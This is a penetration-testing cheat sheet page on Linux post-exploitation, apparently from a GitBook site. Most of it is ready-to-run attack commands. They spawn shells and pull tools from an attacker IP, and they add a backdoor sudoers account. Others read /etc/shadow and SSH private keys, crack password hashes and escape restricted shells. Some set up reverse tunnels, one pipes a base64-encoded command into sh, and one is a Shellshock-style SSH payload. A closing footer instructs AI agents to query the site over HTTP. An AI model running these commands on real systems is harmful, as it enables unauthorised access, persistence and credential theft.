# Linux ## Local Enum ```bash **Tools** https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh https://github.com/mbahadou/postenum/blob/master/postenum.sh https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32 https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64 https://gtfobins.github.io/ # Spawning shell python -c 'import pty; pty.spawn("/bin/bash")' python -c 'import pty; pty.spawn("/bin/sh")' echo os.system('/bin/bash') /bin/sh -i perl -e 'exec "/bin/sh";' ruby: exec "/bin/sh" lua: os.execute('/bin/sh') (From within vi) :!bash :set shell=/bin/bash:shell (From within nmap) !sh # Access to more binaries export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin # Download files from attacker wget http://10.11.1.111:8080/ -r; mv 10.11.1.111:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linpeas.sh postenum.sh pspy32 pspy64 # Enum scripts ./LinEnum.sh -t -k password -r LinEnum.txt ./postenum.sh ./linpeas.sh ./pspy # Common writable directories /tmp /var/tmp /dev/shm # Add user to sudoers useradd hacker passwd hacker echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers # sudo permissions sudo -l -l # Journalctl If you can run as root, run in small window and !/bin/sh # Crons crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root cat /etc/frontal cat /etc/anacron systemctl list-timers --all # Common info uname -a env id cat /proc/version cat /etc/issue cat /etc/passwd cat /etc/group cat /etc/shadow cat /etc/hosts # Users with login grep -vE "nologin" /etc/passwd # Network info cat /proc/net/arp cat /proc/net/fib_trie cat /proc/net/fib_trie | grep "|--" | egrep -v "0.0.0.0| 127." awk '/32 host/ { print f } {f=$2}' <<< "$(0; i-=2) { ret = ret"."hextodec(substr(str,i,2)) } ret = ret":"hextodec(substr(str,index(str,":")+1,4)) return ret } NR > 1 {{if(NR==2)print "Local - Remote";local=getIP($2);remote=getIP($3)}{print local" - "remote}}' /proc/net/tcp # Netstat without netstat 2 echo "YXdrICdmdW5jdGlvbiBoZXh0b2RlYyhzdHIscmV0LG4saSxrLGMpewogICAgcmV0ID0gMAogICAgbiA9IGxlbmd0aChzdHIpCiAgICBmb3IgKGkgPSAxOyBpIDw9IG47IGkrKykgewogICAgICAgIGMgPSB0b2xvd2VyKHN1YnN0cihzdHIsIGksIDEpKQogICAgICAgIGsgPSBpbmRleCgiMTIzNDU2Nzg5YWJjZGVmIiwgYykKICAgICAgICByZXQgPSByZXQgKiAxNiArIGsKICAgIH0KICAgIHJldHVybiByZXQKfQpmdW5jdGlvbiBnZXRJUChzdHIscmV0KXsKICAgIHJldD1oZXh0b2RlYyhzdWJzdHIoc3RyLGluZGV4KHN0ciwiOiIpLTIsMikpOyAKICAgIGZvciAoaT01OyBpPjA7IGktPTIpIHsKICAgICAgICByZXQgPSByZXQiLiJoZXh0b2RlYyhzdWJzdHIoc3RyLGksMikpCiAgICB9CiAgICByZXQgPSByZXQiOiJoZXh0b2RlYyhzdWJzdHIoc3RyLGluZGV4KHN0ciwiOiIpKzEsNCkpCiAgICByZXR1cm4gcmV0Cn0gCk5SID4gMSB7e2lmKE5SPT0yKXByaW50ICJMb2NhbCAtIFJlbW90ZSI7bG9jYWw9Z2V0SVAoJDIpO3JlbW90ZT1nZXRJUCgkMyl9e3ByaW50IGxvY2FsIiAtICJyZW1vdGV9fScgL3Byb2MvbmV0L3RjcCAKqtc" | base64 -d | sh # Nmap without nmap for ip in {1..5}; do for port in {21,22,5000,8000,3306}; do (echo >/dev/tcp/172.18.0.$ip/$port) >& /dev/null && echo "172.18.0.$ip port $port is open"; done; done # Open ports without netstat grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}' # Check ssh files: cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat ~/.ssh/identity cat ~/.ssh/id_rsa.pub cat ~/.ssh/id_rsa cat ~/.ssh/id_dsa.pub cat ~/.ssh/id_dsa cat /etc/ssh/ssh_config cat /etc/ssh/sshd_config cat /etc/ssh/ssh_host_dsa_key.pub cat /etc/ssh/ssh_host_dsa_key cat /etc/ssh/ssh_host_rsa_key.pub cat /etc/ssh/ssh_host_rsa_key cat /etc/ssh/ssh_host_key.pub cat /etc/ssh/ssh_host_key # SUID find / -perm -4000 -type f 2>/dev/null # ALL PERMS find / -perm -777 -type f 2>/dev/null # SUID for current user find / perm /u=s -user `whoami` 2>/dev/null find / -user root -perm -4000 -print 2>/dev/null # Writables for current user/group find / perm /u=w -user `whoami` 2>/dev/null find / -perm /u+w,g+w -f -user `whoami` 2>/dev/null find / -perm /u+w -user `whoami` 2>/dev/nul # Dirs with +w perms for current u/g find / perm /u=w -type -d -user `whoami` 2>/dev/null find / -perm /u+w,g+w -d -user `whoami` 2>/dev/null # Port Forwarding # Chisel # Victim server: chisel server --auth "test:123" -p 443 --reverse # In host attacker machine: ./chisel client --auth "test:123" 10.10.10.10:443 R:socks # Dynamic Port Forwarding: # Attacker machine: ssh -D 9050 user@host # Attacker machine Burp Proxy - SOCKS Proxy: Mark “Override User Options” Mark Use Socks Proxy: SOCKS host:127.0.0.1 SOCKS port:9050 # Tunneling Target must have SSH running for there service 1. Create SSH Tunnel: ssh -D localhost: -f -N user@localhost -p 2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf) 3. Add the following line into the config: Socks5 127.0.0.1 4. Run commands through the tunnel: proxychains # SShuttle # https://github.com/sshuttle/sshuttle sshuttle -r root@172.21.0.0 10.2.2.0/24 # netsh port forwarding netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80 netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000 ``` ## Escaping restricted shell ```bash # First check your shell echo $SHELL # and commands export # vim # List files :!/bin/ls -l .b* # Set new shell :set shell=/bin/sh :shell # or :!/bin/sh # ed !'/bin/sh' # ne -> Load Prefs -> Navigate everywhere # more/less/man/pinfo !'sh' # links -> File OS Shell # lynx -> "o" for options -> configure default editor e.g. vim lynx --editor=/usr/bin/vim www.google.com # or export EDITOR=/usr/bin/vim # navigate to https://translate.google.com/ go to text box, ENTER and F4 # mutt ! # find find / -name "root" -exec /bin/sh \; find / -name "root" -exec /bin/awk 'BEGIN {system("/bin/sh")}' \; # nmap < 2009/05 --interactive !sh # awk awk 'BEGIN {system("/bin/sh")}' # expect expect -c 'spawn sh' -i # python python -c 'import pty; pty.spawn("/bin/sh")' # ruby irb exec '/bin/sh' # perl perl -e 'system("sh -i");' perl -e 'exec("sh -i");' # php -a exec("sh -i"); # Only Rbash echo x | xargs -Iy sh -c 'exec sh 0<&1' # Emacs Mod-! /bin/sh # cp cp /bin/sh /dev/shm/sh; /dev/shm/sh # export export SHELL=/bin/sh; export PATH=/bin:/usr/bin:$PATH # FTP/Telnet !/bin/sh # GDB !/bin/sh # eval eval echo echo {o..q}ython\; # tee echo '/bin/rm /home/user/.bashrc' | tee '/home/user/bin/win';win; echo 'export SHELL=/bin/sh' | tee '/home/user/.bashrc' # declare declare -n PATH; export PATH=/bin;bash -i BASH_CMDS[shell]=/bin/bash;shell -i # nano nano -s /bin/sh # Ctrl+T # SSH ssh user@host -t "bash --noprofile -i" ssh user@host -t "() { :; }; sh -i " ``` ## Loot ```bash # Linux cat /etc/passwd cat /etc/shadow unshadow passwd shadow > unshadowed.txt john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt ifconfig -a arp -a tcpdump -i any -s0 -w capture.pcap tcpdump -i eth0 -w capture -n -U -s 0 src not 10.11.1.111 and dst not 10.11.1.111 tcpdump -vv -i eth0 src not 10.11.1.111 and dst not 10.11.1.111 .bash_history /var/mail /var/spool/mail echo $DESKTOP_SESSION echo $XDG_CURRENT_DESKTOP echo $GDMSESSION ``` ## Linux Privilege Escalation {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://cyb3r.gitbook.io/pentestbook/post-exploitation/linux.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.